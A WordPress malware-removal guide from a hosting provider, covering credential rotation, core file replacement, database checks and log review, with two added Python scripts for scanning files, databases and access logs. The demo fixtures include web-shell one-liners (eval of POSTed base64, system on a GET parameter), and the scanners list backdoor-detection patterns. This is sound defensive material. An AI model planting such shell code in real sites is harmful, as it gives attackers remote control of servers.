Your site has been flagged for malware, Google is showing a warning to visitors, or your host has suspended the account. Here's how to clean the infection methodically, get warnings removed, and prevent reinfection. The single most important thing to understand: cleaning malware without identifying how the attacker got in means they'll be back within days through the same door.
WordPress malware takes several common forms. Redirect malware sends visitors (or just search engine bots) to spam or phishing pages while showing you the normal site. Backdoors are hidden PHP files or code injections that let attackers re-enter the site at will, even after you change passwords. SEO spam injects links to pharmaceutical, gambling, or other spam sites into your page content or database to manipulate search rankings. Cryptominers run JavaScript in visitors' browsers to mine cryptocurrency. Credential harvesters intercept login form submissions.
Knowing which type you have helps you know where to look. Redirect malware often lives in .htaccess, wp-config.php, or the active theme's header.php and footer.php, and can also be nothing more than a changed siteurl or home option in the database. Backdoors are frequently found in the uploads directory or disguised as plugin files. SEO spam is typically in the database or injected into theme files.
Backing up an infected site sounds counterintuitive, but it is necessary for two reasons. First, if cleanup goes wrong and the site breaks, you need a known state to restore to. Second, the infected files are forensic evidence of how the attack occurred: modification timestamps, injected code, and access log patterns that help you find and close the entry point. Delete the malware before you've identified the entry point and you may destroy the evidence you need.
Take a full backup (files and database) via your host's control panel or via FTP, and store it somewhere outside the web root. Label it clearly as a pre-cleanup backup containing infected files, so you don't accidentally restore it later thinking it's clean.
Change every password associated with the site before touching anything else: the WordPress admin password (for all admin accounts), the FTP/SFTP password, the database password (update wp-config.php after changing it), and the hosting control panel password. Then replace the authentication keys and salts in wp-config.php with a fresh set (api.wordpress.org/secret-key/1.1/salt/ generates them); rotating the salts invalidates every existing login cookie at once, including cookies for accounts you may have missed. If any admin accounts exist that you didn't create, delete them now: these are backdoor accounts left by the attacker. Check Users > All Users in wp-admin for unfamiliar accounts, and also verify the email address on every existing admin account, since changing it is enough to hijack password resets later.
If the attacker still has valid credentials, they can re-enter and undo your cleanup work as you do it. Lock them out first.
Install Wordfence Security and run a full scan (Wordfence > Scan > Start New Scan). Wordfence compares every WordPress core file against official WordPress.org checksums, every plugin and theme file against the known-good version in the WordPress.org repository (premium themes and plugins aren't in that repository, so re-download those from the vendor and compare them yourself), and scans all PHP files for known malware signatures. It will flag modified core files (restore these, don't just note them), files containing known malware code (delete or clean), and files in unexpected locations such as PHP in the uploads directory (delete). A clean result means no known signature matched, not that the site is clean; the manual checks that follow still apply.
Also run Sucuri SiteCheck (sitecheck.sucuri.net) as an external check. It scans your site's public-facing output for blacklist status, visible malware, and known malware indicators in the HTML. Since Wordfence works server-side and Sucuri SiteCheck works externally, they complement each other: Wordfence finds server-side infections, while Sucuri SiteCheck confirms what visitors and search engines are actually seeing.
Download the exact same version of WordPress you're running from wordpress.org (check your current version in Dashboard > Updates) and extract the ZIP. Via FTP, delete the existing wp-admin and wp-includes directories, then upload the fresh copies. Deleting first matters: simply overwriting replaces the files the attacker modified but leaves behind any extra files they added to those directories, so a backdoor dropped into wp-includes survives an overwrite. Do not delete or overwrite wp-config.php or the wp-content directory; those contain your unique configuration and content.
Also upload the root-level PHP files from the fresh download (index.php, wp-login.php, wp-cron.php, and the rest), overwriting the existing versions, and compare the root directory listing against the fresh download for any root-level PHP file that isn't part of WordPress. This replaces any modified core file with a verified clean copy without touching your content.
This is where most malware hides, because wp-content is site-specific and isn't overwritten when WordPress is updated.
eval() calls on encoded data, and unfamiliar function names. Delete all non-active themes (keeping one fresh default theme as a fallback is fine).
In wp-content/uploads/, treat every PHP file as malware. Legitimate uploads are images, PDFs, and documents, never PHP. Delete any PHP files found, and be thorough: attackers nest them in subdirectories, give them image-like names such as image.php, and use alternate extensions such as .phtml or .php5 that the server may still execute. The one benign thing you may find is an empty index.php stub (typically just a "Silence is golden" comment) that some plugins drop to block directory listing; deleting those does no harm either.
Malware frequently injects content into the database. Open phpMyAdmin and check the following in your WordPress database (substitute your own table prefix if it isn't wp_):
wp_options table: Look at the siteurl and home values; if they point to unfamiliar domains, the attacker changed them. Check widget settings and theme settings for injected JavaScript.
wp_posts table: Search the post_content column for suspicious strings such as <script, known spam domains, or eval(base64.
wp_users table: Verify no unfamiliar admin accounts exist. Cross-reference with Users > All Users in wp-admin. Note that the role is not stored in wp_users at all but in wp_usermeta under the wp_capabilities key, so an account that looks ordinary in wp_users can still be an administrator.
The Better Search Replace plugin makes database-wide search for suspicious strings practical without writing SQL queries. Use it to search for known spam domains you found in the site, run it as a dry run first, and manually review each result before removing anything.
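The file-system and database checks above as one runnable triage script. This is an added example, not code from the article, Wordfence, or Better Search Replace: the obfuscation patterns are a starting set you should tune, the table prefix is assumed to be wp_, and the queries are plain SQL that also works on MySQL but are run here against an in-memory SQLite copy with the same column names so the block runs offline. demo_files() writes a constructed wp-content tree to a temp directory; demo_db() loads constructed rows, including a planted administrator account and a changed home option.

```python
"""wp-content and database triage for a compromised WordPress site.

Added example, not the article's code. Constructed sample data throughout.
"""
import os
import re
import sqlite3
import tempfile
from urllib.parse import urlsplit

PREFIX = "wp_"                                          # assumption: default prefix
PHP_EXT = (".php", ".php5", ".php7", ".phtml", ".phar")  # what the server may execute
SUSPICIOUS = (  # obfuscation/backdoor idioms worth a manual look in themes and plugins
    ("eval-of-decoded", re.compile(
        r"eval\s*\(\s*@?\s*(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)),
    ("long-base64-literal", re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]")),
    ("request-driven-call", re.compile(
        r"\b(eval|assert|system|shell_exec|passthru|exec)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("variable-function-from-request", re.compile(r"\$\w+\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b")),
)


def is_php(name):
    return name.lower().endswith(PHP_EXT)


def php_in_uploads(root):
    """Every PHP-executable file under wp-content/uploads, recursively, dot-dirs included."""
    hits = []
    for dirpath, _dirs, files in os.walk(os.path.join(root, "wp-content", "uploads")):
        for name in files:
            if is_php(name):
                hits.append(os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, "/"))
    return sorted(hits)


def suspicious_php(root):
    """(relative path, pattern name) for theme/plugin PHP files matching SUSPICIOUS."""
    hits = []
    for sub in ("themes", "plugins", "mu-plugins"):
        for dirpath, _dirs, files in os.walk(os.path.join(root, "wp-content", sub)):
            for name in files:
                if not is_php(name):
                    continue
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as f:
                    body = f.read()
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                hits.extend((rel, label) for label, rx in SUSPICIOUS if rx.search(body))
    return sorted(hits)


def audit_db(conn, expected_home, spam_domains=()):
    """siteurl/home pointing elsewhere, injected post content, and who is really an admin."""
    p, cur = PREFIX, conn.cursor()
    expected_host = urlsplit(expected_home).netloc.lower()
    rows = cur.execute(f"SELECT option_name, option_value FROM {p}options "
                       "WHERE option_name IN ('siteurl', 'home')").fetchall()
    bad_urls = [(n, v) for n, v in rows if urlsplit(v).netloc.lower() != expected_host]
    needles = ["%<script%", "%<iframe%", "%eval(base64%"] + [f"%{d}%" for d in spam_domains]
    where = " OR ".join("post_content LIKE ?" for _ in needles)
    posts = cur.execute(f"SELECT ID, post_title FROM {p}posts "
                        f"WHERE post_status <> 'trash' AND ({where}) ORDER BY ID", needles).fetchall()
    admins = cur.execute(  # the role lives in usermeta, not in the users table
        f"SELECT u.ID, u.user_login, u.user_email FROM {p}users u "
        f"JOIN {p}usermeta m ON m.user_id = u.ID "
        f"WHERE m.meta_key = '{p}capabilities' AND m.meta_value LIKE '%administrator%' "
        "ORDER BY u.ID").fetchall()
    return {"bad_urls": bad_urls, "suspicious_posts": posts, "admins": admins}


def demo_files():
    files = {  # constructed tree: two dropped shells, one obfuscated theme file, one clean plugin
        "wp-content/uploads/2024/03/image.php": "<?php eval(base64_decode($_POST['p'])); ?>",
        "wp-content/uploads/.cache/index.phtml": "<?php system($_GET['cmd']); ?>",
        "wp-content/uploads/2024/03/photo.jpg": "not a real jpeg, but not executable either",
        "wp-content/themes/child/functions.php":
            "<?php\nadd_action('init', 'x');\n$d = '" + "QUJD" * 60 + "';\neval(gzinflate(base64_decode($d)));\n",
        "wp-content/plugins/example-plugin/example-plugin.php": "<?php /* Plugin Name: Example */\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in files.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as f:
                f.write(body)
        return php_in_uploads(root), suspicious_php(root)


def demo_db():
    conn = sqlite3.connect(":memory:")
    c = conn.cursor()
    c.executescript(f"""
        CREATE TABLE {PREFIX}options (option_name TEXT, option_value TEXT);
        CREATE TABLE {PREFIX}posts (ID INTEGER, post_title TEXT, post_content TEXT, post_status TEXT);
        CREATE TABLE {PREFIX}users (ID INTEGER, user_login TEXT, user_email TEXT);
        CREATE TABLE {PREFIX}usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);""")
    c.executemany(f"INSERT INTO {PREFIX}options VALUES (?, ?)", [
        ("siteurl", "https://example.com"), ("home", "https://spam.example.net"), ("blogname", "Example")])
    c.executemany(f"INSERT INTO {PREFIX}posts VALUES (?, ?, ?, ?)", [
        (1, "Hello world", "<p>Welcome.</p>", "publish"),
        (2, "About", "<p>Us</p><script src='https://spam.example.net/j.js'></script>", "publish"),
        (3, "Old draft", "<p>eval(base64_decode('...'))</p>", "trash"),
        (4, "Pricing", "<p>cheap pills at pharma.example.org</p>", "publish")])
    c.executemany(f"INSERT INTO {PREFIX}users VALUES (?, ?, ?)", [
        (1, "owner", "owner@example.com"), (2, "wp-support", "noreply@example.net"), (3, "editor", "ed@example.com")])
    c.executemany(f"INSERT INTO {PREFIX}usermeta VALUES (?, ?, ?)", [
        (1, PREFIX + "capabilities", 'a:1:{s:13:"administrator";b:1;}'),
        (2, PREFIX + "capabilities", 'a:1:{s:13:"administrator";b:1;}'),   # planted admin
        (3, PREFIX + "capabilities", 'a:1:{s:6:"editor";b:1;}')])
    return audit_db(conn, "https://example.com", spam_domains=["pharma.example.org"])
```

Against a live site, point php_in_uploads and suspicious_php at the document root over SSH, and run audit_db on a MySQL connection (the SQL is unchanged; only the driver differs). Review every hit by hand before deleting: the patterns are deliberately broad and a minified library can trip the long-base64 check.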
Check your server access logs in cPanel (Metrics > Raw Access Logs). Look for: POST requests to PHP files in the uploads directory (a sign of a file upload exploit), large volumes of requests to wp-login.php or xmlrpc.php before the infection date, requests to plugin-specific PHP files that suggest exploitation of a known vulnerability, and successful POST requests from unfamiliar IPs during unusual hours.
Cross-reference suspicious log timestamps with your plugin update history. Check the WPScan Vulnerability Database (wpscan.com/plugins) for the versions of your installed plugins; if a vulnerability was disclosed around the time of your infection, and the log shows requests to that plugin's files, that's your likely entry point. Update the vulnerable plugin or replace it with an actively maintained alternative.
If Google flagged your site in Search Console, then once cleanup is complete, go to Security & Manual Actions > Security Issues and click "Request Review." Describe clearly what was found, what you removed, and what you've done to prevent recurrence. Be specific; vague requests are more likely to be rejected. Google typically reviews within 24 to 72 hours for security issues and removes the warning once the site is confirmed clean. If the review is rejected, something was missed: run another scan before resubmitting.
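The log patterns described above, as detection logic over raw access log lines. This is an added example, not the article's code: it assumes the Apache combined log format that cPanel's Raw Access Logs export, the sample lines are constructed (203.0.113.0/24 and 198.51.100.0/24 are documentation address ranges, and example-plugin is fictitious), and known_ips stands for your own and your team's addresses.

```python
"""Triage a raw Apache/cPanel access log for likely entry-point signals.

Added example, not the article's code. Sample lines are constructed.
"""
import re
from collections import Counter

LOG_RE = re.compile(  # assumption: combined log format; fields beyond status are ignored
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php"}
UPLOADS_PHP = re.compile(r"^/wp-content/uploads/.*\.(php\d?|phtml)$", re.I)
PLUGIN_PHP = re.compile(r"^/wp-content/plugins/[^/]+/.*\.php$", re.I)


def parse(lines):
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # rotated-log headers, truncated lines, etc.
        rec = m.groupdict()
        rec["status"] = int(rec["status"])
        rec["path"], _, rec["query"] = rec["target"].partition("?")
        yield rec


def triage(lines, login_threshold=20, known_ips=()):
    """Return the four signals the text lists; timestamps are kept so hits can
    be lined up against the plugin update history."""
    uploads_posts, plugin_hits = [], []
    login_counts, unknown_posts = Counter(), Counter()
    for r in parse(lines):
        # 1. Someone executing a PHP file that lives under uploads: file upload exploit.
        if r["method"] == "POST" and UPLOADS_PHP.match(r["path"]):
            uploads_posts.append((r["ts"], r["ip"], r["path"], r["status"]))
        # 2. Volume against the login endpoints per source address.
        if r["path"] in LOGIN_PATHS:
            login_counts[r["ip"]] += 1
        # 3. Direct hits on a plugin's own PHP file with a body or query string
        #    (not via admin-ajax.php or the REST API) is how most plugin exploits look.
        if PLUGIN_PHP.match(r["path"]) and (r["method"] == "POST" or r["query"]):
            plugin_hits.append((r["ts"], r["ip"], r["method"], r["path"], r["status"]))
        # 4. Successful POSTs from addresses you do not recognise.
        if r["method"] == "POST" and r["status"] in (200, 302) and r["ip"] not in known_ips:
            unknown_posts[r["ip"]] += 1
    return {
        "uploads_php_posts": uploads_posts,
        "login_bruteforce": sorted((ip, n) for ip, n in login_counts.items() if n >= login_threshold),
        "plugin_file_hits": plugin_hits,
        "unknown_ip_posts": sorted(unknown_posts.items(), key=lambda kv: -kv[1]),
    }


SAMPLE = """\
198.51.100.7 - - [12/Mar/2024:09:01:10 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.45 - - [12/Mar/2024:03:14:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4523 "-" "python-requests/2.31"
203.0.113.45 - - [12/Mar/2024:03:14:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4523 "-" "python-requests/2.31"
203.0.113.45 - - [12/Mar/2024:03:14:03 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "python-requests/2.31"
203.0.113.45 - - [12/Mar/2024:03:14:04 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.31"
203.0.113.45 - - [12/Mar/2024:03:14:05 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "python-requests/2.31"
203.0.113.45 - - [12/Mar/2024:03:16:40 +0000] "POST /wp-content/plugins/example-plugin/upload.php?action=save HTTP/1.1" 200 13 "-" "curl/8.4.0"
203.0.113.45 - - [12/Mar/2024:03:16:55 +0000] "POST /wp-content/uploads/2024/03/image.php HTTP/1.1" 200 61 "-" "curl/8.4.0"
198.51.100.7 - - [12/Mar/2024:10:22:13 +0000] "POST /wp-admin/post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
this line is not an access log entry
"""


def demo():
    # Threshold lowered to 5 for the short sample; tens per hour is more realistic.
    return triage(SAMPLE.splitlines(), login_threshold=5, known_ips={"198.51.100.7"})


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On a real log, feed it the file directly: triage(open("access-log").read().splitlines(), known_ips={...}). The story the sample tells is the usual one: a login burst, a POST to a plugin file with a query string, then the first request to the dropped shell fifteen seconds later; that plugin file plus its version is what you take to the vulnerability database.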
For sites with daily backups, restoring to a pre-infection snapshot is often faster and more reliable than manual cleanup. HostBible includes daily backups with offsite storage on all plans.